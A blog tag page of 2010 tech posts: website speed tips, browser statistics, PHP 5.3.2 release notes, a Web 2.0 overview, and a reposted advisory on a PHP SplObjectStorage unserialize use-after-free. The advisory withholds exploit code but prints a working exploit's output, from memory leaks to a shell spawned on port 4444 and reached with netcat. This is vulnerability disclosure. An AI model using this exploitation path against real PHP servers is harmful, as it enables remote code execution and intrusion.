Posts Tagged ‘Technology’

Ways to Optimize Your Website Speed

Website speed has been an under-estimated ranking factor for some time, and continues to be so even now. However, with Google campaigning for a faster internet, it makes sense that the search engine considers page loading speeds when analysing any site.

Slow websites can be an exasperating experience. In fact, many will be put off by such an inconvenience to the extent that they will likely take their business elsewhere in such cases. Not only does a lack of haste create fury amongst users, it is also a contributor to reduced conversion rates, and lower traffic levels.

For these reasons, it is vital for any web designer to ensure that what can be done should be done to speed up the proceedings on their site. The obvious irritation felt when encountering a lethargic website should be enough for site developers to address the situation, but with the knowledge that Google consider this aspect when ranking websites, webmasters have this as an added incentive for site activity acceleration.

Although not deemed to be as influential as, say, the updated content or relevance of back links within a site, the speed factor could provide the edge with which you will leave competitors eating your dust in the race for pole position.

In order to achieve a faster loading time, there are several amendments which can be made. Firstly, ensure that any given page is not overloaded with content. Common sense dictates that the greater the page size, the longer it will take for said page to load.

In terms of images, make sure that they take up as little space as is needed; by cropping the image prior to uploading it onto a site, one can ensure that amount of data is not excessive for the required effect.

Technically, the opportunity to monitor your site via Google Analytics is highly beneficial. By keeping track of traffic levels and visitor activity within your site, it is possible to determine the general performance of your web pages. This is an ideal way to check that your SEO web design techniques are performing to their optimum levels.

Another advantageous alteration to consider is the caching of certain data. Content which is a staple part of your site, and which will change rarely, if at all, can be cached in order to reduce loading time. When a piece of information is cached, the browser need only refer to the data rather than downloading it every time a page is opened. This leads to a reduction of HTTP requests which in turn results in a reduced load time.

With many plug-ins available to help you monitor the speed of your website such as Firebug’s Page Speed feature, or the Speed Tracer application, you are not alone in carrying out such optimizations.

Please read the detailed pdf for “Best Practice to optimized your website

For details please visit


IE nightmare will over soon !


Now we are at the over mid of the year, and In year 2010 following is the interesting data for end users.

Number of users for “Internet Explorer” are dramatically reducing.  Surprisingly there are 7.2% of people are still using IE6.

(IE 6 is very venerable and has high risk of getting attacked by latest Malwares and Browsers Hackers)

Browser Statistics

2010 IE8 IE7 IE6 Firefox Chrome Safari Opera
July 15.6% 7.6% 7.2% 46.4% 16.7% 3.4% 2.3%
June 15.7% 8.1% 7.2% 46.6% 15.9% 3.6% 2.1%
May 16.0% 9.1% 7.1% 46.9% 14.5% 3.5% 2.2%
April 16.2% 9.3% 7.9% 46.4% 13.6% 3.7% 2.2%
March 15.3% 10.7% 8.9% 46.2% 12.3% 3.7% 2.2%
February 14.7% 11.0% 9.6% 46.5% 11.6% 3.8% 2.1%
January 14.3% 11.7% 10.2% 46.3% 10.8% 3.7% 2.2%

Internet Explorer Version Statistics

The following table is a breakdown of the Internet Explorer numbers from our Browsers Statistics:

2010 Total IE 8 IE 7 IE 6
July 30.4 % 15.6 % 7.6 % 7.2 %
June 31.0 % 15.7 % 8.1 % 7.2 %
May 32.2 % 16.0 % 9.1 % 7.1 %
April 33.4 % 16.2 % 9.3 % 7.9 %
March 34.9 % 15.3 % 10.7 % 8.9 %
February 35.3 % 14.7 % 11.0 % 9.6 %
January 36.2 % 14.3 % 11.7 % 10.2 %


This is really very good sign for “HTML Designers” and “Web Developers”. Industry is wasting time and revenue on fixing IE issues. It was a really “Nightmare” for the HTML Designers to fix layout in different different versions of Internet Explorer.

This year people are started using HTML 5 and CSS 3. There is very limited support for HTML 5 and CSS 3 in IE6… IE7 and IE8. The new version of IE i.e. IE9 has a HTML 5 / CSS 3 Support.

Though Google has been intimidating its users for long to stop using IE6, it finally declared to set its foot down, saying:

“In order to continue to improve our products and deliver more sophisticated features and performance, we are harnessing some of the latest improvements in web browser technology.  This includes faster JavaScript processing and new standards like HTML5.  As a result, over the course of 2010, we will be phasing out support for Microsoft Internet Explorer 6.0 as well as other older browsers that are not supported by their own manufacturers. Later in 2010, we will start to phase out support for these browsers for Google Mail and Google Calendar.”

So lets hope for best and by the end of the year we will really FREE from this IE Nightmare!

MOPS-2010-061: PHP SplObjectStorage Deserialization Use-After-Free Vulnerability

A use-after-free vulnerability was discovered in the deserialization of SPLObjectStorage objects that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected versions

Affected is PHP 5.2 <= 5.2.13
Affected is PHP 5.3 <= 5.3.2




This vulnerability was disclosed by Stefan Esser of SektionEins GmbH during the SyScan Singapore 2010 security conference.

Detailed information

PHP’s unserialize() function has had many memory corruption and use-after-free vulnerabilities in the past. Therefore it should be obvious by now that exposing it to user supplied input is not a good idea. However many widespread PHP applications directly unserialize() the content of cookies or POST requests. Especially closed source PHP applications developed for websites often use serialized user input.

In addition to that the APIs of popular services/applications like WordPress transfer serialized data over insecure HTTP connections, which makes them vulnerable to unserialize() exploits via man-in-the-middle-attacks. Even more applications deserialize the content of database fields which means SQL injection vulnerabilities can be used to launch attacks against unserialize(). As demonstrated by the MOPS-2010-060 vulnerability even simple arbitrary writes to the $_SESSION variable can result in attacks against unserialize(), too. And the story does not stop here because many more applications deserialize the content of cache files, so arbitrary file overwrite vulnerabilities can be used to launch attacks against unserialize() and lead to arbitrary code execution although everything except the cache files is not writable.

While the core of the unserialize() function was audited very heavily during the last years the SPL objects shipping with PHP and supporting deserialization have not been audited very much. Therefore it was no suprise to find a use-after-free vulnerability in the SPLObjectStorage implementation that is very similar to a vulnerability in theunserialize() core that was fixed in 2004 and disclosed by us, too.

In PHP 5.3.x the actual vulnerability is caused by the spl_object_storage_attach() function removing previously inserted extra data if the same object is inserted twice.

void spl_object_storage_attach(spl_SplObjectStorage *intern, zval *obj, zval *inf TSRMLS_DC) /* {{{ */
spl_SplObjectStorageElement *pelement, element;
pelement = spl_object_storage_get(intern, obj TSRMLS_CC);
if (inf) {
} else {
if (pelement) {
pelement->inf = inf;
element.obj = obj;
element.inf = inf;
zend_hash_update(&intern->storage, (char*)&Z_OBJVAL_P(obj), sizeof(zend_object_value), &element, sizeof(spl_SplObjectStorageElement), NULL);
zend_object_value zvalue;
memset(&zvalue, 0, sizeof(zend_object_value));
zvalue.handle = Z_OBJ_HANDLE_P(obj);
zvalue.handlers = Z_OBJ_HT_P(obj);
zend_hash_update(&intern->storage, (char*)&zvalue, sizeof(zend_object_value), &element, sizeof(spl_SplObjectStorageElement), NULL);
} /* }}} */

Because the extra data attached to the previous object is freed in case of a duplicate entry it can be used in a use-after-free attack that as demonstrated during SyScan can be used to leak arbitrary pieces of memory and or execute arbitrary code.

In PHP 5.2.x the vulnerability is similar but not exactly the same, because SPLObjectStorage is only an object set and does not store extra data. However inserting a double value with the same binary representation of an object will result in the object being freed early which again allows similar use-after-free exploits. Due to the nature of this type confusion attack the vulnerability is only exploitable on 32 bit systems for PHP 5.2.x. This restriction does not apply to PHP 5.3.x.

Proof of concept, exploit or instructions to reproduce

Due to the dangerous nature of the vulnerability, exploit code for this vulnerability will not be published. However the following is the output of a working exploit in action.

$ ./ -h http://t.testsystem/
PHP unserialize() Remote Code Execution Exploit (TikiWiki Version)
Copyright (C) 2010 Stefan Esser/SektionEins GmbH

[+] Connecting to determine wordsize
[+] Wordsize is 32 bit
[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
[+] PHP version is 5.3.x
[+] Connecting to determine SPLObjectStorage version
[+] PHP version >= 5.3.2
[+] Determining endianess of system
[+] System is little endian
[+] Leaking address of std_object_handlers
[+] Found std_object_handlers address to be 0xb76e84a0
[+] Leaking std_object_handlers
[+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
[+] Optimized to 0xb74008f0
[+] Scanning for executable header
[+] ELF header found at 0xb73ab000
[+] Retrieving and parsing ELF header
[+] Retrieving program headers
[+] Retrieving ELF string table
[+] Looking up ELF symbol: executor_globals
[+] Found executor_globals at 0xb76fe280
[+] Looking up ELF symbol: php_execute_script
[+] Found php_execute_script at 0xb75386c0
[+] Looking up ELF symbol: zend_eval_string
[+] Found zend_eval_string at 0xb7586580
[+] Searching JMPBUF in executor_globals
[+] Found JMPBUF at 0xbfcc64b4
[+] Attempt to crack JMPBUF
[+] Determined stored EIP value 0xb753875a from pattern match
[+] Calculated XORER 0x68ab06ea
[+] Unmangled stored ESP is 0xbfcc5470
[+] Checking memory infront of JMPBUF for overwriting possibilities
[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
[+] Returning into PHP… Spawning a shell at port 4444

$ nc t.testsystem 4444
Welcome to the PHPShell 5/22/2010 1:27 am

system(“uname -a”);
Linux fedora13x86 #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0


This vulnerability was disclosed on June 18th, 2010 at the SyScan Singapore 2010 security conference.

Among the audience of the conference was a member of the RedHat Linux Security Team that immediately forwarded the information to other people at RedHat that patched their version of PHP and shared the information and patch with the PHP developers.

Due to the nature of the bug the exploit is very similar against different applications using unserialize() however small modifications are required.

The exploitation path demonstrated at the SyScan conference will not work against PHP installations patched with theSuhosin patch. Therefore only people that have choosen to be less secure (a.k.a. running PHP without Suhosin-Patch applied) might be in immediate danger. However the vulnerability is exploitable with a more complicated exploit on systems running Suhosin, too.

PHP 5.3.2 Released!

The PHP development team is proud to announce the immediate release of PHP 5.3.2. This is a maintenance release in the 5.3 series, which includes a large number of bug fixes.

Security Enhancements and Fixes in PHP 5.3.2:

  • Improved LCG entropy. (Rasmus, Samy Kamkar)
  • Fixed safe_mode validation inside tempnam() when the directory path does not end with a /). (Martin Jansen)
  • Fixed a possible open_basedir/safe_mode bypass in the session extension identified by Grzegorz Stachowiak. (Ilia)

Key Bug Fixes in PHP 5.3.2 include:

  • Added support for SHA-256 and SHA-512 to php’s crypt.
  • Added protection for $_SESSION from interrupt corruption and improved “session.save_path” check.
  • Fixed bug #51059 (crypt crashes when invalid salt are given).
  • Fixed bug #50940 Custom content-length set incorrectly in Apache sapis.
  • Fixed bug #50847 (strip_tags() removes all tags greater then 1023 bytes long).
  • Fixed bug #50723 (Bug in garbage collector causes crash).
  • Fixed bug #50661 (DOMDocument::loadXML does not allow UTF-16).
  • Fixed bug #50632 (filter_input() does not return default value if the variable does not exist).
  • Fixed bug #50540 (Crash while running ldap_next_reference test cases).
  • Fixed bug #49851 (http wrapper breaks on 1024 char long headers).
  • Over 60 other bug fixes.

What is Web 2.0?

The term “Web 2.0” is commonly associated with web applications that facilitate interactive information sharing, interoperability, user-centered design and collaboration on the World Wide Web. A Web 2.0 site allows its users to interact with each other as contributors to the website’s content, in contrast to websites where users are limited to the passive viewing of information that is provided to them. Examples of Web 2.0 include web-based communities, hosted services, web applications, social-networking sites, video-sharing sites, wikis, blogs, mashups, and folksonomies.

The term is closely associated with Tim O’Reilly because of the O’Reilly Media Web 2.0 conference in 2004 Although the term suggests a new version of the World Wide Web, it does not refer to an update to any technical specifications, but rather to cumulative changes in the ways software developers and end-users use the Web. Whether Web 2.0 is qualitatively different from prior web technologies has been challenged by World Wide Web inventor Tim Berners-Lee, who called the term a “piece of jargon” — precisely because he specifically intended the Web to embody these values in the first place.

History: From Web 1.0 to 2.0

The term “Web 2.0” was coined in 1999 by Darcy DiNucci. In her article, “Fragmented Future,” DiNucci writes:

The Web we know now, which loads into a browser window in essentially static screenfulls, is only an embryo of the Web to come. The first glimmerings of Web 2.0 are beginning to appear, and we are just starting to see how that embryo might develop. The Web will be understood not as screenfulls of text and graphics but as a transport mechanism, the ether through which interactivity happens. It will  appear on your computer screen, on your TV set your car dashboard  your cell phone  hand-held game machines maybe even your microwave oven.

Her use of the term deals mainly with Web design and aesthetics; she argues that the Web is “fragmenting” due to the widespread use of portable Web-ready devices. Her article is aimed at designers, reminding them to code for an ever-increasing variety of hardware. As such, her use of the term hints at – but does not directly relate to – the current uses of the term.

The term did not resurface until 2003. These authors focus on the concepts currently associated with the term where, as Scott Dietzen puts it, “the Web becomes a universal, standards-based integration platform”.

In 2004, the term began its rise in popularity when O’Reilly Media and MediaLive hosted the first Web 2.0 conference. In their opening remarks, John Battelle and Tim O’Reilly outlined their definition of the “Web as Platform”, where software applications are built upon the Web as opposed to upon the desktop. The unique aspect of this migration, they argued, is that “customers are building your business for you”. They argued that the activities of users generating content (in the form of ideas, text, videos, or pictures) could be “harnessed” to create value.

O’Reilly et al. contrasted Web 2.0 with what they called “Web 1.0”. They associated Web 1.0 with the business models of Netscape and the Encyclopedia Britannica Online. For example,

Netscape framed “the web as platform” in terms of the old software paradigm: their flagship product was the web browser, a desktop application, and their strategy was to use their dominance in the browser market to establish a market for high-priced server products. Control over standards for displaying content and applications in the browser would, in theory, give Netscape the kind of market power enjoyed by Microsoft in the PC market. Much like the “horseless carriage” framed the automobile as an extension of the familiar, Netscape promoted a “webtop” to replace the desktop, and planned to populate that webtop with information updates and applets pushed to the webtop by information providers who would purchase Netscape servers.

In short, Netscape focused on creating software, updating it on occasion, and distributing it to the end users. O’Reilly contrasted this with Google, a company which did not at the time focus on producing software, such as a browser, but instead focused on providing a service based on data. The data being the links Web page authors make between sites. Google exploits this user-generated content to offer Web search based on reputation through its “page rank” algorithm. Unlike software, which undergoes scheduled releases, such services are constantly updated, a process called “the perpetual beta”.

A similar difference can be seen between the Encyclopedia Britannica Online and Wikipedia: while the Britannica relies upon experts to create articles and releases them periodically in publications, Wikipedia relies on trust in anonymous users to constantly and quickly build content. Wikipedia is not based on expertise but rather an adaptation of the open source software adage “given enough eyeballs, all bugs are shallow”, and it produces and updates articles constantly.

O’Reilly’s Web 2.0 conferences have been held every year since 2004, attracting entrepreneurs, large companies, and technology reporters. In terms of the lay public, the term Web 2.0 was largely championed by bloggers and by technology journalists, culminating in the 2006 TIME magazine Person of The Year – “You”. That is, TIME selected the masses of users who were participating in content creation on social networks, blogs, wikis, and media sharing sites. The cover story author Lev Grossman explains:

It’s a story about community and collaboration on a scale never seen before. It’s about the cosmic compendium of knowledge Wikipedia and the million-channel people’s network YouTube and the online metropolis MySpace. It’s about the many wresting power from the few and helping one another for nothing and how that will not only change the world, but also change the way the world changes.

Since that time, Web 2.0 has found a place in the lexicon; in 2009 Global Language Monitor declared it to be the one-millionth English word.


Flickr, a Web 2.0 web site that allows its users to upload and share photos

Web 2.0 websites allow users to do more than just retrieve information. They can build on the interactive facilities of “Web 1.0” to provide “Network as platform” computing, allowing users to run software-applications entirely through a browser. Users can own the data on a Web 2.0 site and exercise control over that data. These sites may have an “Architecture of participation” that encourages users to add value to the application as they use it.

The concept of Web-as-participation-platform captures many of these characteristics. Bart Decrem, a founder and former CEO of Flock, calls Web 2.0 the “participatory Web” and regards the Web-as-information-source as Web 1.0.

The impossibility of excluding group-members who don’t contribute to the provision of goods from sharing profits gives rise to the possibility that rational members will prefer to withhold their contribution of effort and free-ride on the contribution of others. This requires what is sometimes called Radical Trust by the management of the website. According to Best, the characteristics of Web 2.0 are: rich user experience, user participation, dynamic content, metadata, web standards and scalability. Further characteristics, such as openness, freedom and collective intelligence by way of user participation, can also be viewed as essential attributes of Web 2.0.

Technology overview

Web 2.0 draws together the capabilities of client- and server-side software, content syndication and the use of network protocols. Standards-oriented web browsers may use plug-ins and software extensions to handle the content and the user interactions. Web 2.0 sites provide users with information storage, creation, and dissemination capabilities that were not possible in the environment now known as “Web 1.0”.

Web 2.0 websites typically include some of the following features and techniques. Andrew McAfee used the acronym SLATES to refer to them:


Finding information through keyword search.


Connects information together into a meaningful information ecosystem using the model of the Web, and provides low-barrier social tools.


The ability to create and update content leads to the collaborative work of many rather than just a few web authors. In wikis, users may extend, undo and redo each other’s work. In blogs, posts and the comments of individuals build up over time.


Categorization of content by users adding “tags” – short, usually one-word descriptions – to facilitate searching, without dependence on pre-made categories. Collections of tags created by many users within a single system may be referred to as “folksonomies” (i.e., folk taxonomies).


Software that makes the Web an application platform as well as a document server.


The use of syndication technology such as RSS to notify users of content changes.

While SLATES forms the basic framework of Enterprise 2.0, it does not contradict all of the higher level Web 2.0 design patterns and business models. And in this way, the new Web 2.0 report from O’Reilly is quite effective and diligent in interweaving the story of Web 2.0 with the specific aspects of Enterprise 2.0. It includes discussions of self-service IT, the long tail of enterprise IT demand, and many other consequences of the Web 2.0 era in the enterprise. The report also makes many sensible recommendations around starting small with pilot projects and measuring results, among a fairly long list.

How it works

The client-side/web browser technologies typically used in Web 2.0 development are Asynchronous JavaScript and XML (Ajax), Adobe Flash and the Adobe Flex framework, and JavaScript/Ajax frameworks such as Yahoo! UI Library, Dojo Toolkit, MooTools, and jQuery. Ajax programming uses JavaScript to upload and download new data from the web server without undergoing a full page reload.

To permit the user to continue to interact with the page, communications such as data requests going to the server are separated from data coming back to the page (asynchronously). Otherwise, the user would have to routinely wait for the data to come back before they can do anything else on that page, just as a user has to wait for a page to complete the reload. This also increases overall performance of the site, as the sending of requests can complete quicker independent of blocking and queueing required to send data back to the client.

The data fetched by an Ajax request is typically formatted in XML or JSON (JavaScript Object Notation) format, two widely used structured data formats. Since both of these formats are natively understood by JavaScript, a programmer can easily use them to transmit structured data in their web application. When this data is received via Ajax, the JavaScript program then uses the Document Object Model (DOM) to dynamically update the web page based on the new data, allowing for a rapid and interactive user experience. In short, using these techniques, Web designers can make their pages function like desktop applications. For example, Google Docs uses this technique to create a Web-based word processor.

Adobe Flex is another technology often used in Web 2.0 applications. Compared to JavaScript libraries like jQuery, Flex makes it easier for programmers to populate large data grids, charts, and other heavy user interactions. Applications programmed in Flex, are compiled and displayed as Flash within the browser. As a widely available plugin independent of W3C (World Wide Web Consortium, the governing body of web standards and protocols), standards, Flash is capable of doing many things which are not currently possible in HTML, the language used to construct web pages. Of Flash’s many capabilities, the most commonly used in Web 2.0 is its ability to play audio and video files. This has allowed for the creation of Web 2.0 sites where video media is seamlessly integrated with standard HTML.

In addition to Flash and Ajax, JavaScript/Ajax frameworks have recently become a very popular means of creating Web 2.0 sites. At their core, these frameworks do not use technology any different from JavaScript, Ajax, and the DOM. What frameworks do is smooth over inconsistencies between web browsers and extend the functionality available to developers. Many of them also come with customizable, prefabricated ‘widgets’ that accomplish such common tasks as picking a date from a calendar, displaying a data chart, or making a tabbed panel.

On the server side, Web 2.0 uses many of the same technologies as Web 1.0. Languages such as PHP, Ruby, ColdFusion, Perl, Python, JSP and ASP are used by developers to dynamically output data using information from files and databases. What has begun to change in Web 2.0 is the way this data is formatted. In the early days of the Internet, there was little need for different websites to communicate with each other and share data. In the new “participatory web”, however, sharing data between sites has become an essential capability. To share its data with other sites, a web site must be able to generate output in machine-readable formats such as XML, RSS, and JSON. When a site’s data is available in one of these formats, another website can use it to integrate a portion of that site’s functionality into itself, linking the two together. When this design pattern is implemented, it ultimately leads to data that is both easier to find and more thoroughly categorized, a hallmark of the philosophy behind the Web 2.0 movement.


The popularity of the term Web 2.0, along with the increasing use of blogs, wikis, and social networking technologies, has led many in academia and business to coin a flurry of 2.0s, including Library 2.0, Social Work 2.0, Enterprise 2.0, PR 2.0, Classroom 2.0, Publishing 2.0, Medicine 2.0, Telco 2.0, Travel 2.0, Government 2.0, and even Porn 2.0. Many of these 2.0s refer to Web 2.0 technologies as the source of the new version in their respective disciplines and areas. For example, in the Talis white paper “Library 2.0: The Challenge of Disruptive Innovation”, Paul Miller argues

Blogs, wikis and RSS are often held up as exemplary manifestations of Web 2.0. A reader of a blog or a wiki is provided with tools to add a comment or even, in the case of the wiki, to edit the content. This is what we call the Read/Write web.Talis believes that Library 2.0 means harnessing this type of participation so that libraries can benefit from increasingly rich collaborative cataloguing efforts, such as including contributions from partner libraries as well as adding rich enhancements, such as book jackets or movie files, to records from publishers and others.

Here, Miller links Web 2.0 technologies and the culture of participation that they engender to the field of library science, supporting his claim that there is now a “Library 2.0”. Many of the other proponents of new 2.0s mentioned here use similar methods.

Source: wikipedia